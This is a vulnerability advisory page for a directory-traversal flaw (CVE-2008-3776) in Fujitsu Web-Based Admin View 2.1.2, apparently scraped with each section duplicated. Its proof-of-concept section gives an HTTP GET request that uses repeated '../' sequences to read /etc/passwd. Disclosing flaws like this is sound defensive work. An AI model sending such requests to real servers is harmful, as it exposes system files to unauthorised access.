Fujitsu Web-Based Admin View Directory Traversal Vulnerability
BID:30780
Info
Fujitsu Web-Based Admin View Directory Traversal Vulnerability
| Bugtraq ID: | 30780 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-3776 |
| Remote: | Yes |
| Local: | No |
| Published: | Aug 21 2008 12:00AM |
| Updated: | May 07 2015 05:24PM |
| Credit: | Deniz CEVIK |
| Vulnerable: |
Fujitsu Web-Based Admin View 2.1.2 |
| Not Vulnerable: | |
Discussion
Fujitsu Web-Based Admin View Directory Traversal Vulnerability
Fujitsu Web-Based Admin View is prone to a directory-traversal vulnerability because the application fails to sufficiently sanitize user-supplied input. This issue occurs in the application's HTTP server.
Exploiting this issue will allow an attacker to view arbitrary local files within the context of the webserver. Information harvested may aid in launching further attacks.
Web-Based Admin View 2.1.2 is vulnerable; other versions may also be affected.
Fujitsu Web-Based Admin View is prone to a directory-traversal vulnerability because the application fails to sufficiently sanitize user-supplied input. This issue occurs in the application's HTTP server.
Exploiting this issue will allow an attacker to view arbitrary local files within the context of the webserver. Information harvested may aid in launching further attacks.
Web-Based Admin View 2.1.2 is vulnerable; other versions may also be affected.
Exploit / POC
Fujitsu Web-Based Admin View Directory Traversal Vulnerability
An attacker can exploit this issue via readily available tools.
The following example is available:
GET /.././.././.././.././.././.././.././.././.././etc/passwd HTTP/1.0
Host: www.example.com:8081
An attacker can exploit this issue via readily available tools.
The following example is available:
GET /.././.././.././.././.././.././.././.././.././etc/passwd HTTP/1.0
Host: www.example.com:8081
Solution / Fix
Fujitsu Web-Based Admin View Directory Traversal Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Fujitsu Web-Based Admin View Directory Traversal Vulnerability
References:
References:
- Fujitsu Homepage (Fujitsu)